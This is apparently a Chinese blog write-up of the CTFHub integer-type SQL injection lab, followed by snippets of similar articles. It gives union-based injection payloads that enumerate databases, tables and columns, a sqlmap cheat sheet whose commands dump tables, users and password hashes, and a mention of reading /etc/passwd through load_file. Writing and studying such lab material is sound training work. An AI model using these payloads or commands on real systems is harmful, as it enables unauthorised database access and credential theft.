CTFHub(整数型注入)

最新推荐文章于 2024-06-08 13:42:36 发布
最新推荐文章于 2024-06-08 13:42:36 发布
阅读量2.2k 收藏 8
点赞数 12
分类专栏: ctfhub SQL注入 文章标签: sql mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_58784379/article/details/119046308
版权

目录

SQL注入的前提

手动注入

sqlmap注入

SQL注入的前提

  1. 判断是否具备注入条件
    1. 可控参数如id=1,能否影响页面的显示结果
    2. 输入SQL语句的时候,是否报错,能否通过报错,看到数据库回显的一些语句痕迹
    3. 尝试使输入的语句不报错,使得成功闭合语句
  2. 判断是什么类型的注入
  3. 语句能否被修改
  4. 是否能够成功执行

手动注入

首先判断是否存在注入,输入1回显,输入2回显,输入3,无回显

根据回显内容判断为整数型

 开始爆字段id=1 order by 1,当id =1 order by 3,发现报错,得知表格只有两个字段

 开始查询当前数据库,或者直接查询所有的数据库

id=1 and 1=2 union select 1,group_concat(schema_name) from information_schema.schemata

得到数据库,开始爆表名,两张表,一个为news,一个为flag,开始爆列名

 列名也为flag,可以尝试查看flag的内容

column_name:列的名称

Information_schema.columns:表示所有的列的信息

Information_schema:表示所有信息,包括库、表、列

Information_schema.tables:表示所有的表的信息

table_schema:数据库的名称

table_name:表的名称

sqlmap注入

关于sqlmap的基础命令,将url修改为需要注入的url即可

查询sqlmap是否存在注入命令
sqlmap.py -u url/?id=1
查询当前用户下的所有数据库
sqlmap.py -u url/?id=1 --dbs
获取数据库的表名
sqlmap.py -u url/?id=1 -D (数据库名) --tables
获取表中的字段名
sqlmap.py -u url/?id=1 -D (数据库名) -T (输入需要查询的表名) --columns
获取字段的内容
sqlmap.py -u url/?id=1 -D (数据库名) -T (输入需要查询的表名) -C (表内的字段名) --dump
查询数据库的所有用户
sqlmap.py -u url/?id=1 --users
查询数据库的所有密码
sqlmap.py -u url/?id=1 --passwords
查询数据库名称
sqlmap.py -u url/?id=1 --current-db

bbb07
关注
  • 12
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 4
    评论
专栏目录
ctfhub 整数型注入
plant1234的博客
06-16 1002
整数型注入: 需要了解mysql的知识点: union select 联合查询,联合注入常用 database() 回显当前连接的数据库 version() 查看当前sql的版本如:mysql 1.2.3, mariadb-4.5.6 group_concat() 把产生的同一分组中的值用,连接,形成一个字符串 information_schema 存了很多mysql信息的数据库 information_schema.schemata information_schema库的一个表,名为schemata s
CTFHub - 整数型注入
Have_a_great_day的博客
09-07 463
欢迎各位师傅以kill -9 的威力对文章进行检查,Zeus会认真分析听取各位师傅的留言。
CTFHub:web前置技能-SQL注入-整数型注入
wdnmddbl的博客
06-08 703
路漫漫其修远兮,吾将上下而求索。本文涉及以下知识点,去引用文章学习即可:链接:我是一个知识点链接:我是一个知识点链接:我是一个知识点链接:sqlmap下载点我文章总结有我个人总结的一些知识点,希望对你有所帮助。大概思路和涉及的知识点sql注入基本语句和手工注入流程:#,–+,-- -代表后边忽略,常用与闭合思路:sql注入之数字型注入点:许多网页链接有类似的结构。
CTFHub | 整数型注入
尼泊罗河伯的博客
10-25 2532
根据题目描述输入 1 进行测试,发现此题可能存在 SQL 注入漏洞。那么使用' and 1 = 1 ‘和' and 1 = 2’进行判断,此题存在 SQL 整数型漏洞注入。那么第一步先判断字段数量,然后检查数据库位置,知道数据库位置后查看数据库版本和数据库名。接着查看一下全部数据库名,并查看这些数据库的表名,发现一个表名为 flag 比较可疑。查看这个表名的全部字段后接着查看表中的数据得到此题 flag 。
CTFHUB——整数型SQL注入
陈艺秋的博客
01-14 1315
整型SQL注入
CTFHUB(六)之整数型注入
ScyLamb的博客
03-03 243
直接跑sqlmap sqlmap -u http://challenge-d2092f951b60f48a.sandbox.ctfhub.com:10080/?id=1 看到可注入 sqlmap -u http://challenge-d2092f951b60f48a.sandbox.ctfhub.com:10080/?id=1 --dbs 下意识选了sqli sqlmap -u http://...
整数型和字符型注入.docx
04-02
### 整数型和字符型注入详解 #### 一、SQL注入概述 SQL注入是一种常见的安全漏洞,攻击者可以通过向应用程序提交恶意SQL语句来获取敏感数据、篡改数据或控制整个数据库服务器。根据注入方式的不同,SQL注入可以分为...
ctfhub web全部做题记录(持续跟新)
01-08
分为整数型和字符型注入,以及报错注入。可以通过调整查询参数来获取数据库信息,甚至直接读取flag字段。 【文件上传漏洞】无验证的文件上传功能可被利用来上传恶意文件,如PHP后门。通过修改文件头,绕过前端验证...
详解易语言写内存整数型
08-26
在本文中,我们将深入探讨如何使用易语言来实现写内存整数型的功能,这是一种在程序运行时修改内存中特定地址的整数值的技术。 首先,我们需要了解基本的编程流程。在易语言中,我们可以通过以下几个步骤来实现这个...
易语言保存和读取整数型数组
07-24
本篇我们将深入探讨如何在易语言中实现整数型数组的保存与读取。 首先,我们需要了解易语言中的数组概念。数组是一种可以存储多个相同类型数据的数据结构,通常用下标来访问其元素。在易语言中,我们可以定义整数型...
整数型到二进制文本.rar
03-19
标题中的“整数型到二进制文本”指的是将十进制整数转换为二进制表示,并可能将其存储或显示为文本格式。这个过程在计算机科学和编程中至关重要,因为计算机内部处理的所有数据都是以二进制形式(0和1)存在的。下面...
[CTFHub]整数型注入(web>SQL注入
ZXW_NUDT的博客
05-12 309
输入1后发现url改变 使用order by语句查询字段数 使用union联合查询检测信息回显位置 由于页面只允许返回一行内容,所以则修改参数1为-1,使需要查询的信息回返 获取当前数据库名 获取所有数据库名 查询数据库sqli表名 获取flag列所有字段名 获取指定数据库的表的列的内容 ...
ctfhub 整数型注入(手动注入
qq_54929891的博客
09-14 457
这段时间看了web安全里面有关sql注入以及一些博客,终于基本了解了一下如何做这种题目用手动注入 第一步,判断是否有注入点(构造sql语句来比对不同) 这是按照提示输入1回显结果,我们可以利用恒真恒假来判断是否修改语句有用 发现输入恒假1=2的时候没有回显,代表有注入点,可以改变sql语句 第二步 利用order by来获取回显的信息判断字段数(因为这个题目没有引号,加不加#省略号没有影响) 发现字段数为2,order by 3的时候没有回显利用1 and 1=2恒假语句来把原先的..
CTFHub 整数型注入sqlmap)
qq_54929891的博客
09-12 406
00
CTFHUB-技能树-Web题-SQL注入-整数型注入
Static______的博客
03-28 485
利用 group_concat() 函数进行查询连接所有的表名。还可以读取到 /etc/passwd 文件。load_file( )函数 读文件操作。1,2又有数值,说明两字段都有回显。由此判断存在两个字段。
CTF hub 整数型注入
m0_63253040的博客
02-24 1217
尝试输入1,发现有回显 题目给出了查询语句,为整数型,再验证下 判断为整数型没错,若为字符型,则 select * from news where id = '1 and 1=1' select * from news where id = '1 and 1=2' 不会出现上述结果。 爆字段 发现2正常回显 3不显,只有2个字段 再看看数据库:sqli 3 union select 1,database() //3是为了先保证之前的数据查不出来 ...
CTFHub SQL 整数型注入[四步]
luminous_you的博客
12-04 438
判断列数 1 order by 2 判断回显点 1 union select 1,2 判断表名列名 -1 union select 1,group_concat(table_name,'_',column_name) from information_schema.columns where table_schema=database() 得出结果【两种方法】 -1 union select 1,flag from sqli.flag limit 0,1 -1 union select 1,(se
CTFCTFHub------web-SQL注入-整数型注入
从零开始的网安生活
07-23 400
文章目录SQL注入整数型注入 SQL注入 整数型注入 1.打开链接根据提示输入1 1.先检查数据库有无注入点 python sqlmap.py -u http://challenge-7a209e58efdf655a.sandbox.ctfhub.com:10080/?id=1 得到 GET parameter 'id' is vulnerable. ...
ctfhub SQL 整数型注入
qq_52671379的博客
06-21 330
SQL 整数型注入 题目 当输入值为1或2时有回显 当输入3时无回显 判断是否存在注入 加单引号 对应的id=3’ 这时sql语句出错,程序无法正常从数据库中查询出数据,无回显。 作为sql注入的小白,我决定不采用大佬们的方法,看不懂,先分享自己的方法,非常传统。 由以上得知有两个字段,所以第一步,爆库名; '' union select 1,database() # 第二,爆表名; '' union select 1,group_concat(table_name) from information_
cfhubSQL 整数型注入
最新发布
07-23
CFHUB SQL整数型注入通常是指在处理用户输入并用于构造SQL查询的过程中,如果对用户提供的整数值未做足够的验证或过滤,恶意用户可能会利用这种漏洞插入恶意的SQL代码。攻击者通过提交精心构造的整数,可以试图修改数据库结构、查看敏感数据或者执行非授权操作。 例如,假设有一个SQL查询是这样的: ```sql SELECT * FROM users WHERE id = <用户输入> ``` 如果没有正确的输入验证,如果用户输入了一个包含额外字符的整数,如`1; DROP TABLE users`,那么实际执行的查询将可能是: ```sql SELECT * FROM users WHERE id = 1; DROP TABLE users ``` 这可能导致数据库表被意外删除或其他安全风险。 为了防止整数型注入,应该对用户输入进行严格的验证和转义,只接受预期格式的整数值,并确保它们不会改变查询的结构或引入意外命令。同时,建议使用预编译语句或者参数化查询,这种方法可以避免直接拼接字符串,从而降低注入的风险。
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值